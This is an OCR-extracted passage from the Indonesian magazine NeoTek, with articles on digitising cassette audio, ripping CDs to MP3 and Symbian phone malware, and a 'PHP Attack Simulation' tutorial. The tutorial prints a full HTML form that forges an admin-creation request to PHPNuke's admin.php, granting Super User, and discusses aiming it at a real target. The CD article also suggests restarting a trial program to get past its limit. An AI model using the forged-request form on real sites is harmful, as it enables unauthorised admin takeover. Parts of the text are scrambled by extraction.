merah-putih atau merah-hitam). Video editing pada dasarBuatlah satu kabel bekas mic. nya adalah proses-proses dengan ujungnya terdapat jack sebagai berikut: 1/8 inch dengan ujungnya yang • Encoding masih terkelupas tembaga. • Cutting • Combining Satukan ujung tembaga itu ke • Editing ujung kabel VCD tadi (merah• Encoding (lagi) putih). Apabila dikupas, dalam • Burning kabel mic. akan terlihat dua kabel kecil berwarna merah dan putih dan di luarnya terdapat serat tembaga, gulung kabel merah sendiri dan putih sendiri, begitu pula yang seratnya. Kabel VCD anda apabila dikupas akan memiliki warna yang sama, tapi di lain kabel terkadang berwarna merah (jack hitam) dan kuning (jack merah), dan mempunyai serat tembaga seperti kabel mic. tadi, lakukan hal yang sama terhadap kabel VCD ini seperti apa yang anda lakukan terhadap kabel mic. Setelah semuanya beres sekarang sambungkan kedua-duanya. Ingat kabel merah dengan merah dan putih dengan putih, dalam hal ini kabel kecil warna merah dengan kabel kecil warna kuning dan kabel kecil warna putih dengan kabel kecil merah VCD dan serat kedua kabel digabungkan. Setelah selesai jangan lupa untuk melapisinya dengan tape isolasi. Sekarang adalah memasukkan kedua kabel itu ke tempat yang seharusnya.

Audio Editing dengan Pinnacle Studio 8

1

SOUND CARD ANDA
Lihat bagian belakang komputer anda, akan terlihat 3 buah colokan berwarna merah-biru-hijau. Ini adalah perangkat Sound Card anda. Yang berwarna hijau adalah Output Speaker, dan dua lainnya masing-masing Mic (merah) dan Line-in (biru). Jadi terdapat 1 output line dan 2 input line.

2

SIAPKAN KABEL
Siapkan kabel anda yang sudah jadi, yang beli ataupun buat sendiri.

3A

KOMPUTER: LINE-IN ATAU MIC?
Jack kabel yang ujungnya hanya satu masukkan ke Line-in atau Microphone.

Vol. IV No. 04 NeoTek

27

NeoStyle

3B

KOMPUTER: LINE-IN ATAU MIC?
Pada beberapa sound card suaranya berbeda. Ketika dicoba pada Creative Vibra 128k, dimasukkan ke Line-in; suaranya terlalu kecil tapi halus dan bila dimasukkan kedalam line Mic. suara besar tapi kasar. Jadi Sound Card anda menentukan hal ini

4

UJUNG LAIN KE HI-FI
Bagaimana dengan kedua ujung kabel yang lainnya? Dua jack itu dimasukkan ke line Output tape anda. Jangan sampai salah ketika memasukkan Jack-nya; masukkan ke tempat yang warna Jack dan Output-nya sama.

5

AKTIFKAN LINE-IN DAN MIC
Sewaktu memulai proses digitalisasi, anda harus mengaktifkan Volume Panel Windows anda. Klik icon Speaker di ujung kanan taskbar, lalu klik Recording Control > Properties dan beri tanda centang pada Line-in dan Microphone.

6

HARWARE ACCELERATION & SAMPLING RATE
Setelah mengaktifkan fungsi recording, atur kinerja suara recording di Setting > Control Panel > Multimedia, klik Advance Properties dan geser bar Hardware Acceleration pada full dan Sample rate conversion rate-nya best atau di tengah-tengah.

7A

Untuk merekam harus mempunyai software recording. Windows telah menyediakan software khusus untuk merekam yaitu Sound Recorder, anda dapat cari di Start > Programs > Accesories > Entertainment. Atau gunakan Audio Record Wizard yang dapat di-download di www.share2.com/ audio-record-wizard atau Polderbits Sound Recorder yang dapat di- download di www.polderbits.com.

7B
28

RADIO RECORD WIZARD
Audio Record Wizard dapat anda download di http://www.share2.com/audio-record-wizard. Versi ini adalah trial version yang hanya memungkinkan untuk merekam hanya 3 menit,

7C

POLDERBITS SOUND RECORCDER
Polderbits Sound Recorder yang dapat anda download di http://www.polderbits.com lagi-lagi berupa versi trial tapi semua fungsi dan fasilitasnya full, dan dapat anda pakai hanya dalam 15 hari.

NeoTek Vol. IV No. 04

NeoStyle

8

MENJALANKAN AUDIO RECORD WIZARD
Setelah setting diaktifkan, buka Audio Record Wizard, dan pada tape tekan tombol play untuk memainkan lagu. Pada ARW tekan tombol record (warna merah). Anda akan diminta men-save file rekaman di tempat yang anda pilih.

9

DIGITALISASI SUARA
Setelah itu anda dapat lihat proses perekaman sedang berlangsung.Anda akan melihat grafik suara dari kaset anda yang sedang didigitalisasi.

10

VOLUME CONTROL UNTUK PLAYBACK
Setelah selesai tekan tombol Stop di ARW dan tape anda, lalu mainkan hasil rekaman anda. Untuk itu buka lagi volume control panel anda dan klik pada Playback, aktifkan semuanya kecuali modem dan mixer.

11

MAINKAN DI AUDIO TIMELINE PINNACLE STUDIO 8
Setelah itu anda dapat masukkan file tadi kedalam audio timeline Pinnacle Studio 8. Disini terlihat adanya track 13 sebagai file rekaman.

12

MENAMBAHKAN NARASI
Anda dapat juga merekam suara anda sendiri ke dalam file komputer apabila anda mempunyai microphone khusus komputer. Aktifkan mic. recording pada Pinnacle Studio 8 apabila anda ingin menambahkan suara anda sendiri.

13

KONVERSI BALIK DARI FILE KE AUDIO TAPE
File MP3 atau file audio komputer dapat direkam pada pada tape. Caranya: ujung yang hanya satu dari kabel masukkan ke Speaker Output Sound Card, lalu jack merah-putih-nya masukkan ke Input Tape anda. Jangan lupa mengaktifkan tombol CD-Line di tape anda.

Vol. IV No. 04 NeoTek

29

NeoStyle

Konversi CD Lagu Jadi MP3
MA Rody Candera (odyxb@melva.org) membawakan artikel ringan mengemai cara mengkonversi track-track pada Audio CD menjadi file-file format MP3. Secara tidak langsung artikel ini melengkapi artikel audio editing yang dibahas sebelumnya.
Tentu saja sama seperti penulis. Melakukan pekerjaan sehari-hari sambil mendengar musik kesukaan atau di saat bersantai sambil mendengar lagu favorit merupakan hal yang sangat mengasyikkan. Seperti penulis sendiri disaat membuat artikel selalu memutarkan lagu-lagu kesukaan di WinAmp. Ada ujaran mengatakan, Hidup tanpa musik itu membosankan. Benar atau tidaknya, penulis memang selalu suka mendengar musik atau lagu-lagu ketika mengerjakan sesuatu karena membuat suasana menjadi terasa santai. Untuk mendengarkan musik atau lagu tersebut terkadang kita memutarnya dari radio/tape recorder, CD Player, atau mungkin dari WinAmp (program pemutar lagu berformat mp3 di PC). Jika kita berada di depan PC lebih asik mendengar musik atau lagu yang diputar di WinAmp. Untuk dapat memutar musik atau lagu dari WinAmp kita diharuskan memiliki musik atau lagu dengan format mp3. Untuk mendapatkan itu kita bisa membeli CD yang berisi musik atau lagu yang berformat mp3 di toko-toko yang menjual CD software komputer. Tapi bagaimana jika lagu yang kita suka ternyata tidak terdapat dalam CD musik mp3 yang kita beli, lagu yang disuka ternyata terdapat dalam CD yang diputar di CD Player. Memang telah beredar program CD Player untuk PC seperti Windows Media Player dan lain sebagainya, tapi bagaimana bagi anda pengkoleksi mp3 menginginkan musik atau lagu yang berformat mp3. Tenang saja, keinginan anda akan tetap bisa terlaksana. Kini ada program yang dapat mengkonversi lagu dalam format *.cda (cd track audio/format lagu yang diputar di CD Player) ke bentuk *.mp3 Sekarang ini banyak program yang dapat mengkonversi musik atau lagu yang berformat *.cda menjadi musik
30

M P3 CD R I P P E R

A

NDA SUKA MENDENGAR MUSIK?

atau lagu berformat *.mp3 Seperti yang akan dibahas pada artikel ini. Salah satunya adalah MP3 CD Ripper, tetapi yang beredar masih dalam bentuk trial version dan anda diharuskan mendaftar (registrasi) untuk mendapatkan full version-nya. Walaupun begitu, trial version-nya pun sudah cukup memuaskan hati kita karena yang ada hanya pembatasan dalam melakukan konversi (5 track lagu). Jika cukup banyak lagu yang akan dikonversi, setelah 5 lagu dikonversi, tutup program MP3 CD Ripper, kemudian aktifkan lagi, terus begitu saja. Jika kita ingin yang dapat mengkonversi semua dari content lagu yang tersedia di CD ke bentuk lagu mp3, anda diharuskan mendaftar dan nantinya akan mendapatkan ID dan kode untuk mengaktifkan full version-nya. Kemampuan MP3 CD Ripper ini tidak hanya mengkonversi ke bentuk mp3 saja, tetapi juga mampu mengkonversi ke bentuk wav. Kemampuan lainnya adalah melakukan hal kebalikannya yaitu dari mp3 ke cda. MP3 CD Ripper bisa anda download dari www.dandans.com atau anda dapatkan dari CD NeoTek bulan ini. Setelah itu install di komputer anda untuk dapat menggunakannya. Komputer atau PC anda setidaknya memiliki CD-ROM karena yang akan dilakukan adalah mengkonversi lagu yang biasa diputar CD Player ke bentuk mp3. Penulis menggunakan CD-ROM Samsung 52X. Untuk dapat memutar hasilnya nanti, WinAmp juga harus sudah dimiliki oleh komputer anda.

Menjalankan MP3 CD Ripper.

dapat anda baca batasan yang dimiliki trial version. Untuk dapat mencoba kehandalan program tersebut, klik OK. Sekarang coba anda masukkan piringan CD lagu ke dalam CD ROM anda, setelah itu akan anda lihat daftar lagu yang terdapat dalam CD tersebut.

Menjalankan MP3 CD Ripper
Setelah MP3 CD Ripper terinstal di komputer anda, jalankan dari Start > Program > MP3 CD Ripper > MP3 CD Ripper Seperti gambar yang tampak berikut ini tampilan MP3 CD Ripper, karena yang kita miliki merupakan trial version,

Begitu CD audio dimasukkan ke dalam CD ROM drive, MP3 CD Ripper akan membaca track-track yang ada dan siap mengkonversinya.

NeoTek Vol. IV No. 04

NeoStyle
Anda akan menjumpai lagu-lagu dalam dengan nama/title Track-01.mp3. Itu bukan berarti lagu-lagu yang terdapat dalam piringan CD tersebut telah menjadi format mp3 tetapi nantinya akan dikonversi menjadi bentuk seperti itu. Untuk memberi title lagu tersebut nantinya, klik ganda lagu yang diseleksi. Setelah tanda check, proses dapat dilanjutkan dengan mengklik icon convert Tunggulah proses konversi sampai 100%, tidak memakan waktu terlalu lama.

tuk lagu yang lain. Penulis telah mencoba mengkonversi sekitar 50-an lagu. Sekarang coba aktifkan WinAmp anda untuk mendengarkan lagu hasil konversi tadi. Klik Add dan tujukan ke tempat penyimpanan hasil konversi, setelah itu dan nikmatilah hasil pekerjaan anda.
Anda bisa mengubah nama generik menjadi nmama lagunya.

Setelah itu, kita perlu menentukan hasil (output) atau penyimpanan lagu yang telah dikonversi, perhatikan

Icon untuk menentukan tempat penyimpanan

Menyimpan file hasil konversi. Proses konversi berlangsung.

Klik gambar (icon) untuk menentukan tempat penyimpanan.
Menetapkan tempat menyimpan file

Setelah mencapai 100%, klik Close. Sekarang anda telah mengkonversi satu lagu. Anda dapat mengulanginya un-

Catatan: Konversi CD audio menjadi file MP3 hanya legal apabila untuk digunakan sendiri dan bukan untuk dikomersialkan.

Selanjutnya adalah menseleksi lagu yang akan dikonversi dengan memberikan tanda check di kotak kecil yang terdapat pada bagian depan.

Pilih track untuk di-rip.

Memainkan file mp3 hasil ripping pada WinAmp.

Vol. IV No. 04 NeoTek

31

NeoTekno

Malware pada Symbian OS
Semua smart phone pada dasarnya suatu komputer kecil yang menggunakan sistem operasi, baik itu Symbian OS, Palm, maupun Pocket PC, membuatnya rentan terhadap serangan malware. Fitranto Halim (fitriantoh@hotmail.com) mengingatkannya pada anda.
mengenal malicious software (disingkat malware), seperti: trojan, virus, worm dan lain-lain. Lalu sepintas kita pernah mendengar adanya virus pada handphone. Apakah memang benar handphone juga rentan terhadap malware? Pada artikel ini, penulis akan membahas mengenai malware pada Symbian OS. Symbian OS adalah sistem operasi yang digunakan pada handphone seperti Nokia 7650, 3650, 3660 (Symbian OS 6) atau Sony Ericsson P800 (Symbian OS 7)

M O B I LE S E C U R IT Y

P

ADA PC KITA TENTUNYA TELAH

Overview Malware
Topik tentang malware dapat dikatakan adalah suatu topik yang menarik, karena kelahiran malware tidak terlepas dari teknologi komputasi itu sendiri. Sebagai contoh adalah media penyebarannya, yang dulu hanya sebatas pada disket, namun sejak teknologi internet mulai dipakai secara umum maka penyebarannyapun melalui internet (terutama melalui e-mail). Tingkat kerusakannya pun tidak ketinggalan, di mana dulu hanya mengincar bagian vital dari disk seperti boot sector, FAT, root directory serta partisi, kini ditambah dengan cara overwrite flash memory seperti yang dilakukan pada virus CIH. Itu sebabnya saat ini banyak pabrikan motherboard yang menyediakan dual flash memory, walau menurut penulis cara tersebut tidak dijamin aman.

Karena aplikasi Symbian bersifat spesifik (hanya dapat dijalankan pada ponsel tertentu), maka seandainya dibuatkan malware tingkat penyebarannya pun masih tergolong rendah. Dengan demikian, media penyebarannya yang paling memungkinkan adalah melalui removable media (seperti multimedia card) ataupun download dari internet, sehingga yang paling cocok adalah berupa kamuflase dari suatu aplikasi. Tingkat kerusakan yang ditimbulkannya mungkin sangat tergantung pada pustaka yang disediakan. Namun, kita jangan menutup mata bahwa dengan kemampuan bahasa assembly untuk processor yang dipergunakan (ARM atau Thumb), maka dapatlah dibuat file object yang kemudian dilink dengan file-file object lainnya (tentunya dalam bahasa C++) untuk membuat sebuah aplikasi Symbian.

Dengan demikian, kerusakan yang ditimbulkan virus CIH yaitu melakukan overwrite flash memory dapat saja terjadi pada ponsel. Cara penularannya yang paling mudah adalah dengan melakukan overwrite, sehingga yang dapat dijadikan korban adalah aplikasi-aplikasi Symbian yang terdapat pada RAM serta removable media. Hal ini disebabkan aplikasi Symbian dengan ekstensi APP memiliki header serta menyimpan nama-nama pustaka yang dipergunakan. Untuk lebih jelasnya, Anda dapat mempergunakan IDA untuk men-disassemble aplikasi Symbian. Jika Anda membandingkan antara tampilan bagian awal pada tab Hex View dari IDA dengan tampilan bagian awal yang dihasilkan oleh WiHex, tampak ada perbedaan karena adanya header pada aplikasi Symbian.

Malware pada Ponsel
Lalu, bagaimana halnya malware pada ponsel? Menurut penulis sejak dipergunakan Symbian OS pada ponsel, ada kemungkinan malware dapat menyusup pula pada ponsel. Hal ini disebabkan pustaka (library) yang disediakan dalam bahasa C++ sangat lengkap, sehingga Anda bisa membuat aplikasi seperti File Manager. Ingatlah, pada umumnya malware membutuhkan kemampuan baca/tulis file serta kemampuan untuk menelusuri directory.
32

Program untuk Symbian OS di-disassemble dengan IDA.

NeoTek Vol. IV No. 04

NeoTekno

Dokumentasi lanjutan untuk mempelajari bahasa assembly untuk ARM (Advanced Risc Machine).

Smart Phone yang Beredar
Symbian OS Symbian OS merupakan sistem operasi pertama untuk ponsel dan kini diterapkan oleh Sony Ericsson pada P800, Z900 (Symbian OS 7) serta oleh Nokia 3650, 3660, 7650 (Symbian OS 6). Palm OS Palm OS PDA yang juga merupakan ponsel di antaranya adalah PalmOne Tungsten W, Treo 600, dan Zircon Z3 Pocket PC Smartphone berbasis Zircon Z3, suatu Pocket PC smartphone berbasis yang paling Palm OS 4.1.2 dengan populer ukuran hanya sedikit lebih adalah O2 besar daripada xda, walauNokia 6510. pun kini semakin banyak manufaktur Taiwan yang memproduksi Pocket PC phone seperti Mitac Mio 3630. Vol. IV No. 04 NeoTek
33

Tampilan bagian awal software untuk Symbian OS dengan Hex View dari IDA (atas) dibandingkan demgan yang dihasilkan oleh WinHex.

Hanya, penulis belum memperoleh informasi mengenai isi dari header tersebut. Untuk memperoleh dokumentasi yang berisi bahasa assembly dari ARM atau Thumb, Anda dapat berkunjung ke situs ARM (Advanced RISC Machines) dengan URL:

http://www.arm.com/arm/documentat ion?OpenDocument. Mudah-mudahan artikel ini dapat menambah kehati-hatian Anda dalam memilih aplikasi Symbian OS. Untuk pelengkap berikut adalah daftar ringkas menmgenai smartphone dan OS yang digunakannya.

NeoTekno

PHP Attack Simulation
Mempelajari hacking secara positif penting untuk mengasah pemahaman kita mengenai suatu sistem, dan dengan demikian berkontribusi untuk menciptakan sistem yang lebih baik. MA Rody Candera (odyxb@melva.org) mengajak melakukan simulasi hacking terhadap sistem milik sendiri.
jutkan, berkembang begitu pesat sekali. Telematika menjadikan Internet sebagai ajang penting yang patut diperhatikan dan disimak perkembangannya. Dalam perkembangan itu turut hal lain yang juga memiliki perkembangan yang pesat. Atau dapat dikatakan beriringan kemajuannya, ternyata keduanya merupakan hal yang tidak dapat dipisahkan karena satu dengan yang lainya saling membantu untuk meningkatkan hasil yang lebih baik. Hal lain tersebut adalah tidak lain yaitu hacking. Apa itu hacking? NeoTek sebagai salah satu mass media berbentuk majalah yang hadir setelah orde baru runtuh dari tahtanya, telah menyajikan atau membahas mengenai hacking itu dihitung sejak Volume II hingga saat ini yang sudah memulai Volume IV. Jadi secara pemahaman bahasa untuk kata hacking, tentu tidak perlu lagi kita bahas dalam kesempatan ini, walaupun hacking itu belum tuntas pembahasannya. Hemat penulis, kegiatan yang dapat menjelaskan hacking itu perlu untuk diadakan di berbagai kesempatan apapun. Hal itu didasarkan kepada nilai informasi pendidikan akan salah satu teknologi penting yang memiliki dampak luas kepada aspek-aspek kehidupan dan dirasakan perlu untuk dipahami maupun dikuasai. Sebenarnya, jika membahas masalah hacking, pemikiran kita akan tertuju kepada masalah keamanan (security). Hacker, istilah yang diberikan kepada pelaku dari hacking, secara umum di pandangan orang memiliki perspektif yang dari waktu ke waktu mengalami peyempitan arti yang cukup signifikan. Penyempitan makna tersebut mem-vonis hacker adalah perusak. Jika mengamati realita yang ada, memang seperti terlihat vonis tersebut adalah benar, tetapi jika diamati lebih mendalam justru hacker adalah teman seperjalanan kehidupan dunia telematika menuju kemajuan yang baik demi menghasilkan suatu hasil yang lebih baik lagi.

WE B S E C U R IT Y

P

ERKEMBANGAN TELEMATIKA SAAT INI SUNGGUH MENGE-

Kalaulah diibaratkan kepada kehidupan sebuah negara, dengan ada pemerintahan yang disandingkan dengan partai oposisi, serta kelompok garis keras yang setiap saat kelihatan menjadi lawan (begitulah kira-kira penulis menggambarkannya). Gembok, rantai, ataupun peralatan kunci yang digunakan untuk mengamankan rumah kita tidak akan pernah tercipta dan bahkan kita tidak akan pernah tahu dengan benda tersebut jika tidak ada pencuri di dunia ini (bukan berarti penulis membela pencuri).

Hacking Tools and Tutorial
Hacking makin begitu begitu mudah untuk dilakukan, ini disebabkan karena tersedianya hacking tools dan tutorial yang mudah dijumpai atau didapatkan dengan berselancar di internet. Hacking tools yang dimaksudkan disini adalah program atau skrip atau lain sebagainya yang membantu seseorang dalam melakukan menembus keamanan (security) suatu akses. Dengan menggunakan hacking tools dan tutorial tersebut, seseorang tidak perlu lagi memiliki kemampuan akan pengetahuan dibidang komputer dan internet yang lebih. Sebegitu membantunya, sehingga seseorang yang memiliki kemampuan akan komputer yang biasa saja dapat melakukan hacking. Wow... mengejutkan sekali bukan? Ini menjadi sebuah tantangan yang hebat bagi para adminadmin yang tentu saja tidak ingin kebobolan, ditambah lagi kapan serangan akan dilakukan tidak diketahui. Untuk melakukan hacking, pada dasarnya memang dibutuhkan tools demi terlaksananya hacking, siapapun itu. Terkadang atau umumnya, kemudahan melakukan hacking yang hanya dengan gampangnya mencomot dan menggunakan hacking tools atau mengikuti petunjuk tutorial yang ada untuk melakukan hacking tanpa ada keinginan atau malas untuk mempelajari daripada hacking tools itu sendiri

Footprinting

Scanning

Enumeration

Pilfering

Escalating Privileges

Gaining Access

Covering Tracks

Creating Backdoor

Denial of Service

Gambar 1. Anatomi proses hacking (versi NeoTek). 34

NeoTek Vol. IV No. 04

NeoTekno
dan malas untuk berkreasi atau menemukan sendiri celahcelah kelemahan suatu sistem. Ini sebuah fenomena yang tidak dapat ditutup-tutupi dan cukup menyedihkan. Sebaiknya kita belajar mencoba melakukan hacking berdasarkan anatomi serangan hacking yang ada maupun kita pikirkan sendiri. Memang tidak gampang tapi itulah proses belajar, tetapi jika ada kemauan dan niatan yang kuat, mudahmudahan kita akan berhasil. Setelah berhasilpun, jangan lakukan perusakan terhadap akses yang sudah dibobol.

Bahan: PHPNuke

Analisis

Anatomi Proses Hacking
Pada berbagai edisi majalah NeoTek digambarkan anatomi serangan hacking adalah sebagai tampak pada Gambar 1. Untuk tiap-tiap point dari anatomi hacking tersebut, dalam edisi-edisi NeoTek sudah cukup menjelaskannya, walaupun pembahasan yang ada untuk tiap point tidak tertuju pada satu target yang utuh, tetapi melainkan target yang berbeda-beda. Itu dikarenakan penulisnya yang berbedabeda, atau tidak ada satupun penulis NeoTek yang membahas secara utuh untuk tiap-tiap anatomi hacking tersebut pada satu target. Hal itu tidaklah mengapa, karena tujuan yang ingin disampaikanlah yang sebenarnya perlu untuk dipahami. Dalam realitanya juga, anatomi hacking di atas, tidak selalu menjadi patokan untuk melakukan serangan hacking dan hal inilah yang sebenarnya ingin disampaikan penulis pada kesempatan berikut ini. Ada kalanya, kita membuat sendiri serangan hacking terhadap sebuah target. Begitulah seorang hacker sejati seharus bertindak. Jadi terasa jika menjadi seorang hacker itu sebenarnya tidak gampang atau kita ingin jadi hacker asalasalan yang hanya tinggal menunggu hacking tools dan hacking tutorial akan sistem yang vulnerable dengan serangan hacking. Silakan anda pilih sendiri. Pada kesempatan ini, penulis ingin mengajak untuk membuat sebuah simulasi hacking sebagai bentuk belajar menjadi hacker sejati (harapan penulis). Berbicara simulasi, tentu saja akan menjadi ajang latihan untuk kita untuk mengetahui bagaimana sebenarnya hacker itu merencanakan sebuah serangan hacking.

Kesimpulan; catatan-catatan

Metode: Input Validation Attack Error Scripting

Gambar 2. Anatomi simulasi hacking.

Analisis
Berdasarkan gambar di atas, simulasi sudah dapat kita mulai. Setelah bahan disiapkan dan di instalasi di komputer kita, selanjutnya kita menuju langkah kedua yaitu analisis.

Simulasi Hacking
Content Manajemen Web (CMW) yang berbasis PHP. C CMW berbasis PHP saat ini sudah banyak beredar dalam berbagai nama dan begitu berkibar. Untuk membuat sebuah simulasi hacking, kita perlu mempersiapkan hal-hal yang bersangkutan demi mendukung terlaksananya simulasi dan harapan yang ada agar kita dapat belajar secara maksimal dan mengerti bagaimana seorang hacker bekerja dalam menembus sebuah security system. Buatlah catatan-catatan berdasarkan kemungkinankemungkinan yang dapat dilakukan pada akhirnya nanti. Kita menuju pada langkah persiapan awal. Persiapan yang pertama kita lakukan adalah menentukan target yang akan dicari tahu kelemahannya. Dalam hal ini, penulis memilih PHPNuke versi 6 (versi terakhir yang penulis miliki dan biar up to date...). Untuk dapat menggunakan PHPNuke, penulis menggunakan PHPTriad karena lebih gampang instalasinya. Sampai disini, simulasi sudah dapat dilakukan. Sebenarnya dalam simulasi yang akan kita lakukan, terdapat anatomi simulasi yang terlebih dahulu telah kita persiapkan (Gambar 2).

Gambar 3. Analisis (I).

Dari analisis pertama, catatan yang perlu kita buat adalah hirarki direktori yang terbentu dari PHPNuke. Dari mengamati hierarki direktori-direktori tersebut, kita dapat mengetahui direktori-direktori penting yang nantinya dapat memberikan ide pada metode yang akan digunakan nantinya. PHPTriad yang di instal pada komputer kita membentuk direktori Apache, pada apache direktori mysql ini sangat penting untuk diperhatikan karena database pada PHPNuke diproses disini, dari sini kita bisa saja memikirkan cara untuk mendapatkan database tersebut yang di dalam berisi login admin dan password admin. Jika PHPNuke yang di-instal penulis dikonfigurasi dengan yang baik tentu saja gambaran hirarki direktori yang ada tidak seperti yang terlihat di atas. Banyak lagi yang bisa didapat dari pengamtan akan hierarki direktori tersebut. Vol. IV No. 04 NeoTek
35

NeoTekno
hlm. 24-27 Teknik Menjebol Forum phpBB 2.0.0. Disitu Dani menjelaskan cara memanfaatkan teknik Error Scripting pada file admin_ug_auth.php. Dalam hal ini, penulis bukan meniru cara Dani, tetapi cara tersebut memang sudah merupakan cara yang sering dilakukan para hacker untuk menggali akses. Penulis berpikir, cara inilah yang mungkin lebih efektif untuk saat ini. Error Scripting yang dimanfaatkan yaitu kesalahan skrip pada file admin.php untuk menambah admin baru. Mari kita coba teknik tersebut. Anda membutuhkan sebuah skrip html yang berhubungan akan pemanfaatan Error Scripting pada admin.php. Dimana bisa didapatkan? Gampang... pada tampilan halaman situs seperti terlihat pada Gambar 5, anda bisa mengambil source code-nya dan sunting hingga seperti yang ditunjukkan pada Box 1.
Gambar 4. Analisis (II).

Sekarang kita menganalisis langsung PHPNuke yang telah kita instal pada komputer kita. Buka browser anda, tapi terlebih dahulu setting buka awal dari browser terdapat pada alamat dimana index.php dari PHPNuke berada. Selanjutnya buat login admin setelah itu login sebagai admin. Dari melihat tampilan tersebut, apa yang terlintas pada pikiran kita. Link-link yang berupa tulisan maupun berupa gambar itu yang perlu kita perhatikan, karena kita akan mendapatkan informasi yang penting yang berhubungan mengenai link-link tersebut. Sebagai contoh, arahkan mouse pointer anda ke link bergambar yang terdapat tulisan dibawahnya Edit Admins. Informasi apa yang kita dapatkan? Perhatikan di pojok kiri bawah: http://localhost/phpnuke/html/admin.php?op=mod_authors Jika klik kita lakukan maka proses terjadi di module yang terdapat di direktory admin pada module mod_authors. Sekarang kita coba masuk dengan mengklik link tersebut. Setelah masuk coba lihat-lihat apa yang ditampilkan, ada info penting yang patut kita simak. Pada halaman tersebut ada bagian untuk menambah admin baru. Melihat itu, apa yang terlintas dipikiran anda? Didalam benak penulis, dari sinilah mungkin kelemahan PHPNuke bisa dimanfaatkan oleh orang lain. Kembali buat catatan.

Gambar 5. Analisis (III).

Metode
Banyak analisis yang dapat dilakukan untuk mendapatkan informasi-informasi mengenai system PHPNuke tersebut, tetapi dalam hal ini penulis membataskan pada hal yang telah dijelaskan di atas. Silakan anda berkreasi sendiri. Dari hasil analisis tadi yang dilakukan, mungkin informasi yang didapat adalah: 1. Hierarki direktori Dari sini, terpikirkan ide untuk menggunakan teknik Input Validation Attack untuk menggali akses demi mendapatkan dokumen penting yang bersangkutan dengan proses pada target. Mungkin ide ini cukup sulit untuk dilakukan, tetapi bukanlah hal yang mustahil untuk dilakukan karena sebenarnya pada teknik ini juga menghasilkan informasi yang cukup diperlukan untuk serangan hacking sesungguhnya. 2. Celah menambah admin baru Dari sini, penulis terpikirkan akan hal teknik Error Scripting, dimana PHP merupakan bahasa skrip. Anda pernah membaca artikel Dani Firmansyah di NeoTek Vol. III No. 06
36

Perhatikan Box 1, pada tulisan seperti berikut yaitu: <form action="http://localhost/phpnuke/html/admin.php" method="post"> URL disesuaikan pada akhirnya nanti. URL yang digunakan seperti terlihat pada Box 1 karena setting yang ada mengarahkan kesana. Pada akhirnya nanti pada serangan sesungguhnya mungkin URL yang digunakan memiliki alur yang berbeda yaitu sebagai berikut: http://www.target.com/admin.php Lalu simpan skrip tersebut dengan file berekstension html, contoh: test.html Kemudian kita coba hasilnya. Jalankan file tadi, maka akan anda lihat tampilan halaman seperti pada Gambar 6. Masukkan nama anda pada baris isian Name, terus selanjutnya sampai pada baris isian Email. Pada baris option Permisions, klikpada opsi Super User. Pada baris Password, masukkan password yang kita tentukan. Setelah itu klik tombol Add Author. Amati apa yang terjadi selanjutnya. Dari hasil eksekusi pemanfaatan Error Scripting tersebut berhasil menambah admin baru, lihat Gambar 6 dan Gambar 7 dan perhatikan pada bagian Edit Admins. Sampai disini buat catatannya yang sekiranya penting untuk anda. Penulis telah membuat beberapa catatan yang berhubungan akan hal tersebut:

NeoTek Vol. IV No. 04

NeoTekno
<html><head><title>Teknik Error Scripting</title></head> <body><form action="http://localhost/phpnuke/html/admin.php" method="post"> <table border="0"> <tr><td>Name:</td> <td colspan="3"><input type="text" name="add_name" size="30" maxlength="50"> <font class="tiny">(required, can't be changed later)</font></td></tr> <tr><td>Nickname:</td> <td colspan="3"><input type="text" name="add_aid" size="30" maxlength="30"> <font class="tiny">(required)</font></td></tr> <tr><td>Email:</td> <td colspan="3"><input type="text" name="add_email" size="30" maxlength="60"> <font class="tiny">(required)</font></td></tr> <tr><td>URL:</td><td colspan="3"><input type="text" name="add_url" size="30" maxlength="60"></td></tr> <input type="hidden" name="add_admlanguage" value=""> <tr><td>Permissions:</td> <td><input type="checkbox" name="add_radminarticle" value="1"> Articles</td> <td><input type="checkbox" name="add_radmintopic" value="1"> Topics</td> <td><input type="checkbox" name="add_radminuser" value="1"> Users</td></tr> <tr><td>&nbsp;</td> <td><input type="checkbox" name="add_radminsurvey" value="1"> Surveys</td> <td><input type="checkbox" name="add_radminsection" value="1"> Sections</td> <td><input type="checkbox" name="add_radminlink" value="1"> Web Links</td></tr> <tr><td>&nbsp;</td> <td><input type="checkbox" name="add_radminephem" value="1"> Ephemerids</td> <td><input type="checkbox" name="add_radminfaq" value="1"> FAQ</td> <td><input type="checkbox" name="add_radmindownload" value="1"> Downloads</td></tr> <tr><td>&nbsp;</td> <td><input type="checkbox" name="add_radminreviews" value="1"> Reviews</td> <td><input type="checkbox" name="add_radminnewsletter" value="1"> Newsletter</td> <td><input type="checkbox" name="add_radminforum" value="1"> Forum</td></tr> <tr><td>&nbsp;</td><td><input type="checkbox" name="add_radmincontent" value="1"> Content</td> <td><input type="checkbox" name="add_radminency" value="1"> Encyclopedia</td> <td><input type="checkbox" name="add_radminsuper" value="1"> <b>Super User</b></td></tr> <tr><td>&nbsp;</td> <td colspan="3"><font class="tiny"><i>WARNING: If Super User is checked, the user will get full access!</i></font></td></tr> <tr><td>Password</td><td colspan="3"><input type="password" name="add_pwd" size="12" maxlength="12"> <font class="tiny">(required)</font></td></tr> <input type="hidden" name="op" value="AddAuthor"> <tr><td><input type="submit" value="Add Author"></td></tr> </table></form> Boks 1. </body></html>

Gambar 6. Metode: error scripting (I)

Gambar 7. Metode: error scripting (II)

Kesimpulan
Setelah melakukan analisis dan dilanjutkan kepada metode penyerangan, maka akan didapat kesimpulan berupa catatancatatan yang penting untuk mencoba hasil simulasi ini pada serangan sesungguhnya nanti. Beberapa catatan yang penulis dapatkan di antaranya adalah sebagai berikut:
1. Teknik Input Validation Attack dapat digunakan nanti untuk menggali informasi mengenai penempatan-penempatan direktori demi menentukan URL pada form method. 2. Teknik Error Scripting ternyata berlaku pada PHPNuke, tetapi dalam kondisi Local Intranet dan admin yang bersangkutan juga sedang login/aktif pada hak accesnya. Bagaimana jika admin yang bersangkutan sudah logout/exit? Bagaimana dalam kondisi Internet dan admin yang bersangkutan sedang login pada hak aksesnya? Dan bagaimana jika pada kondisi Internet dan admin yang bersangkutan sudah logout/exit pada login hak accesnya?

Sebenarnya banyak sekali yang catatan-catatan yang dibuat penulis, tetapi bukan catatan-catatan itu yang ingin disampaikan penulis pada kesempatan kali ini. Sengaja memang penulis tidak menampilkan seluruh catatancatatan yang telah dibuat karena hemat penulis sebaiknya anda sendirilah sebaiknya membuat catatan-catatan tersebut sebagai usaha mencoba belajar menjadi hacker sejati. Mungkin anda sudah dapat mengerti apa yang ingin disampaikan penulis.

Akhir
